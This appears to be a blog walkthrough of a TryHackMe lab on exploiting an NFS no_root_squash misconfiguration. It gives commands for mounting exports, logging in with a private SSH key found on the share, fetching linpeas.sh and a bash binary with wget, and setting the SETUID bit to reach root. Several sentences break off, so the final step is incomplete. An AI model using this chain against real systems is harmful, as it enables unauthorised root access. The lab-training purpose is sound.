Network File System (NFS) is a file-sharing protocol used to allow computers on a network to access and share files over a network. It allows multiple users to access the same files on a remote system as if they were local files on their own computers. NFS is an important part of many enterprise networks, allowing for easy collaboration and file sharing.
NFS (network file system) is a file system that enables file sharing between computers of different operating systems (Windows/Linux/Mac).
In this practice box from TryHackMe, we will hack into NFS and exploit a misconfiguration (No-root Squash) to obtain root access and find our final
WHAT IS NO-ROOT SQUASH?
No-root Squash is an uncommon configuration (some might say a misconfiguration) on the NFS file system.
When enabled, it allows remote users to change file permissions on any file and also to add a
SETUID bit to effectively run programs as the root user. Normally it is disabled to protect against hackers, and all root-created files are assigned to an unprivileged owner named
👉 Recommended: If you are interested in learning more technical details about how this works, I’d recommend this article on
no_root_squash and other configuration options when using NFS.
We’ll start with a standard Nmap scan of all ports with the
nmap $targetIP -p-
The scan shows an
nfs service running on port. Let’s find out what directories are mountable with the command:
showmount -e $targetIP
-e for exports)
Let’s go ahead and mount the
/home directory to our target machine. I’m using Parrot OS virtual machine with a Mate desktop environment running in Gnome Boxes. We can mount the
nfs directory directly to our local filesystem with the command:
mount -t nfs $targetIP:/home /mount
-t indicates filetype)
And now we can continue further enumeration by poking around the filesystem.
cd /mount ls -la
We find a user folder in the home directory,
cappuccino and a hidden directory
.ssh. Inside the directory there is an
id_rsa file that holds a private ssh key.
INITIAL FOOTHOLD – USER CAPPUCCINO
After copying the
id_rsa over to our target machine, we can ssh into cappuccino’s account with this command:
ssh -i id_rsa cappuccino@$targetIP
ENUMERATING PRIVILEGE ESCALATION ATTACK VECTORS WITH LINPEAS
Now that we have our initial foothold, we can grab a copy of the well-known script
linpeas.sh from the official git repo and use it to automate the enumeration of attack vectors for privilege escalation on the target machine. We’ll navigate to the
/mount folder and use the command
wget on our attack machine for this:
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Before running the sh program from our target machine, we need to add execute permissions to the file from our attack machine.
The beauty of mounting NFS file systems in Linux is evident here as we can easily add permissions to
linpeas.sh from our attack machine to set up the program to be executable on the target machine.
chmod +x linpeas.sh
linpeas.sh is located in the
/home folder of the target machine, we can run it to start the automated enumeration:
This will dump a long text file full of details about the target machine. The most interesting things for privilege escalation are highlighted in yellow with red text.
Scrolling through the results, we quickly find the
no_root_squash listed under NFS. We will now move forward and exploit this misconfiguration, allowing us to escalate privileges to the root user.
First, let’s grab the bash executable for Ubuntu Server 18.04 from the link on TryHackMe.
Sudo wget https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
Now we add the
SETUID bit to the file bash and make it executable. This is the key to gaining root access with
sudo chmod +sx bash
Running bash now from our target machine doesn’t seem to change us to the root user yet.
The final trick we need to use is to enable persistence mode with the flag
If you liked this tutorial, you’d probably love my video walkthrough as well:
👉 Recommended Tutorial: Alice in Wonderland — TryHackMe
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.